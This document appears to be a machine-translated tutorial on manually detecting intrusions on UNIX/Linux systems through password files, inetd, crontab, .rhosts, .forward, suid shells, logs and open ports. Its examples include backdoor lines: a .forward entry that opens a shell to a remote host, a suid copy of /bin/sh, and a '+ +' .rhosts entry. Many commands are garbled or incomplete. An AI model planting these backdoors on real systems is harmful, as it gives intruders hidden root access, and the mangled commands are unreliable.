Linux Common manual intrusion detection methods and commands

A good network administrator not only to manage the net, can promptly eliminate all kinds of faults, but also pay attention to network security, beware of hacker intrusion. So familiarity with common manual intrusion detection methods and commands should also be one of the basic skills of network administrators. This article introduces some UNIX common manual intrusion detection methods and commands, the network administrators grasp it not only can quickly determine some simple hacker intrusion, but also can deepen the understanding of intrusion detection, so that better use of some intrusion detection and audit tools.

Check to see if there are any suspicious users in the/etc/passwd file

Unix/etc/passwd file is the storage System user password important files, the hacker intrusion system will often use in the passwd file to add privileged users of the way for themselves to leave a back door. So we have to check often, if you have fewer system users, you can take a direct view of the passwd file, the command is as follows:

$ cat/etc/passwd

If you have hundreds of users in your system, it's not going to be a direct view, but we just need to check if we have a privileged user with a UID of 0, and you can use the following command to do this:

$ awk-f: ' $3= = 0 '/etc/passwd

If you also want to see if you have a blank password user, you can use the following command:

$ awk-f: ' length= = 0 '/etc/shadow

Of course, network administrators can not go to see the passwd file every day, we could write a script like the following, and put it into/etc/ In the cron.daily file, let it detect all the UID and GID 0 users in the passwd file every day, and then send the list to root so that the administrator can just watch the mail every day. The specific script is as follows:

$ grep ' 0:0 '/etc/passwd awk ' BEGIN ' ' mail-s ' ' date + '%d%f ' ' root

Check if/etc/inet.conf and crontab files are modified

Inet.conf is the configuration file of the system daemon, where the service will start with the system startup, such as the system open the Telent service, inet.conf file will have such a statement:

Telnet stream TCP nowait root/usr/sbin/in.telnetd in.telnetd

Left to right is the service name, the set interface type, the protocol type, the run action, the user who owns the process, the daemon path name, daemon name, and parameters. The hacker will run his back door by replacing or adding the service, and the administrator should be familiar with the contents of the/etc/inetd.conf, and then list all the services in the following order:

$ ls-l/etc/inetd.conf

Check to see if any of the suspicious services and service names are consistent with their corresponding programs.

The same/etc/crontab file is the profile of the Cron service, which is used by the scheduler to run the service at a specific time, the system crontab files in/etc/, and the crontab file of the root user in/var/spool/crontab/root , its specific format is as follows:

0 0 3/usr/bin/backdoor

From left to right, the minutes, hours, days, months, weeks, and programs to run are represented. Like the above example is the user at midnight every day 0 o'clock run backdoor program, and this backdoor program if it is a hacker program. Understand it, so the network administrator also should often use cat command to see its crontab file, to see if there are hackers mixed.

Check to see if the. rhosts,/etc/hosts.equiv,. Forward files have been modified

These files are often used by hackers to install backdoor files. If your system is open like Rlogin, Rsh, rexec and other R services, then you must check. rhosts,/etc/ Hosts.equiv these two files because services like RSH and Rlogin are based on a simple authentication method for the host name in Rhosts file, hackers simply enter "+ +" to the rhosts file of a user who can access it. Then promise anyone to use this account from anywhere without a password. Log on to your machine from the 513-port Rlogin service and, like the Rsh service, is less likely to be discovered, as is the lack of logging capabilities. hosts.equiv files are similar. The administrator can check these two files with the following command:

$ find/-name "rhosts"-print grep ' + + '
Cat/etc/hosts.equiv

But in fact hackers simply set the. rhosts file to allow the host name and username of an account from the Internet to log on, so it would be better for the administrator to examine the files more carefully with the help of an audit tool.

There is also a. forward file. Putting commands in a. Forward file is a common way for hackers in Unix to regain access. In the home folder of the. forward file, like the user username, the hacker will set the. Forward as follows:

"username"/usr/local/x11/bin/xterm-disp hacksys.other.dom:0.0-e/bin/sh "

The distortion of this method includes changing the system's mail alias file, running a simple script implementation from. Forward to execute in the standard input. So network administrators also need to check. forward files frequently.

Check for dangerous root suid programs

The root suid program is a common way for hackers to leave a backdoor in a UNIX system, after a hacker has obtained root privileges by a variety of methods, he copies a root shell and sets it to a suid (set UID) bit and then saves it in a hidden folder:

#cp/bin/sh/tmp/.backdoor
#chmod U+s/tmp/.backdoor

The next time a hacker logs on to a regular user, just run this. Backdoor can also get root privileges. To find out it is simpler, administrators can use the following command:

# Find/-type F-print

Check System log

UNIX logs can be said to be relatively sound, it records the user login, operation and system events, and so many things. Unix System log files are usually stored in the/var/log and/var/adm directories, but each UNIX version may be different from the location of the log, and you can see the specifics of the log configuration by looking at/etc/syslog.conf. The specific log files are Lastlog, utmp, Wtmp, Syslog, Sulog, and so on, they record different events, by looking at these logs can get some "clues" of hacker intrusion, of course, the premise is that the log has not been tampered with.

If, as Lastlog, records the most recent logon hours and network addresses of all users, we would like to see the last 30 logged-in users and their addresses, using the following command:

Last-30

Utmp is logged to the user who is currently logged on to the system, and we can view it with the WHO command. Wtmp records the history of login and Lognout and can be accessed with the last command. While the Syslog records the logs generated by various programs, the Sulog records the user's conversion to another user using the SU command.

Check to see if there are any suspicious processes

90% of the backdoor and Trojans are in the form of process, so it is important to see if there is a suspicious process, which requires the network administrator to be familiar with each process. Of course the point is to look at the inetd daemon for the UNIX system, because we said earlier that because the inetd daemon program started with the system, the hacker backdoor is usually added to the inet.conf. You can view its processes with the following command:

# PS-AEF grep inetd

Of course inetd a lot, how can you see the suspicious process. First of all, normal inetd pid compared to the previous, the second UNIX system does not use inetd to start a file, if the PS command to see similar to the Inetd-s/tmp/.backdoor start process should pay attention to. If it's not the network administrator's own addition, it means someone has hacked into your system.

Check network connections and open ports

Some of the back doors left by hackers will open the system's new ports for listening, waiting for hackers to connect. The simplest and most common is to bind an encrypted root shell to a high port. So administrators should often check the status of network connections to see if there are suspicious connections and suspicious ports, such common commands are as follows:

To view network adapter settings:

# ifconfig-a

To view the Routing and gateway settings for this machine:

# netstat-m

View all network connections on this computer:

# Netstat-an

View all open ports on this machine:

# Netstat-an grep Listen

The above is a few simple intrusion detection principles and methods, as we can see, manual intrusion detection is quite cumbersome, it is difficult to carry out deep detection, and these tests are mostly based on system commands, if the system files have been replaced by hackers, it is impossible to carry out accurate detection, Some intrusion analysis tools are needed to correctly and effectively carry out intrusion detection and auditing. This article describes the purpose of these methods is not to promote the manual detection of intrusion, the exclusion of intrusion audit tools, but let everyone have a basic understanding of intrusion detection principles, so that network administrators can more correctly and effectively use intrusion analysis tools.